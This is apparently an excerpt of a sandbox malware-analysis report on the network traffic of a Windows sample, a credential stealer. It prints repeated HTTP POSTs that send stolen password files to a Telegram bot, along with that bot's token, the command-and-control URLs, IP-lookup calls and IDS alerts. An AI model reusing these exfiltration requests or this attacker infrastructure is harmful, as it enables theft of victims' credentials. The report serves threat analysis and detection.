                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3a42a08a2d1aHost: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3a8a01617b77Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3ad90f094b47Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3b27997aeb2aHost: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3c6dcdf66e26Host: api.telegram.orgContent-Length: 585Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3cc36a30dbf7Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3d1e894396a8Host: api.telegram.orgContent-Length: 585Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3d660101deb3Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3daa9f561b06Host: api.telegram.orgContent-Length: 585Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3eeb5953a21eHost: api.telegram.orgContent-Length: 585Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3f3a5e4d32a9Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3f8930aa35ebHost: api.telegram.orgContent-Length: 585Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd41b206a536e3Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd423c7dda7c4dHost: api.telegram.orgContent-Length: 585Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd7f79d79e94a6Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8ddccaa63d3a385Host: api.telegram.orgContent-Length: 585Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8de095da994ecc8Host: api.telegram.orgContent-Length: 585
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
                    Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49757 -> 193.122.6.168:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49732 -> 193.122.6.168:80
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49751 -> 104.21.112.1:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49815 -> 104.21.112.1:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49773 -> 104.21.112.1:443
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49744 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 192.168.2.7:49807 -> 104.21.112.1:443 version: TLS 1.0
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2011/01/2025%20/%2005:41:05%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: time.windows.com
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: unknownHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd32713826b139Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 10 Jan 2025 22:06:36 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.00000000029F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                    Source: Yef4EqsQha.exe, 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                    Source: Yef4EqsQha.exe, 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                    Source: Yef4EqsQha.exe, 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: Yef4EqsQha.exe, 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: Yef4EqsQha.exe, 00000006.00000002.3837864810.00000000060E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
                    Source: Yef4EqsQha.exe, 00000006.00000002.3829533118.0000000000AF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/&
                    Source: Yef4EqsQha.exe, 00000006.00000002.3837864810.00000000060E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com//
                    Source: Yef4EqsQha.exe, 00000006.00000002.3837864810.00000000060E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/Y
                    Source: Yef4EqsQha.exe, 00000006.00000002.3837864810.00000000060E0000.00000004.00000020.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3837864810.000000000616B000.00000004.00000020.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3837864810.0000000006114000.00000004.00000020.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3829533118.0000000000B49000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.6.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                    Source: Yef4EqsQha.exe, 00000006.00000002.3837864810.000000000615E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?032a5301acec8
                    Source: Yef4EqsQha.exe, 00000006.00000002.3837864810.000000000615E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?83a11a1991a5b
                    Source: Yef4EqsQha.exe, 00000006.00000002.3837864810.000000000615E000.00000004.00000020.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3829533118.0000000000B49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ac595039059ff
                    Source: Yef4EqsQha.exe, 00000006.00000002.3829533118.0000000000B49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?b8a64a4cbe408
                    Source: Yef4EqsQha.exe, 00000006.00000002.3837864810.000000000616B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab~
                    Source: Yef4EqsQha.exe, 00000006.00000002.3829533118.0000000000B49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enB
                    Source: Yef4EqsQha.exe, 00000006.00000002.3829533118.0000000000AF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?b8a64a4cbe
                    Source: Yef4EqsQha.exe, 00000000.00000002.1384875417.0000000000BF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.mic
                    Source: Yef4EqsQha.exe, 00000000.00000002.1389923913.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Yef4EqsQha.exe, 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                    Source: Yef4EqsQha.exe, 00000006.00000002.3835066178.0000000003951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: Yef4EqsQha.exe, 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3830796545.00000000029DD000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3830796545.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-451
                    Source: Yef4EqsQha.exe, 00000006.00000002.3835066178.0000000003951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: Yef4EqsQha.exe, 00000006.00000002.3835066178.0000000003951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: Yef4EqsQha.exe, 00000006.00000002.3835066178.0000000003951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.00000000029F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                    Source: Yef4EqsQha.exe, 00000006.00000002.3835066178.0000000003951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: Yef4EqsQha.exe, 00000006.00000002.3835066178.0000000003951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: Yef4EqsQha.exe, 00000006.00000002.3835066178.0000000003951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: Yef4EqsQha.exe, 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: Yef4EqsQha.exe, 00000006.00000002.3835066178.0000000003951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: Yef4EqsQha.exe, 00000006.00000002.3835066178.0000000003951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.00000000029F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50211 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50119 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50235 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50187 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50221 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50144 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50209 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
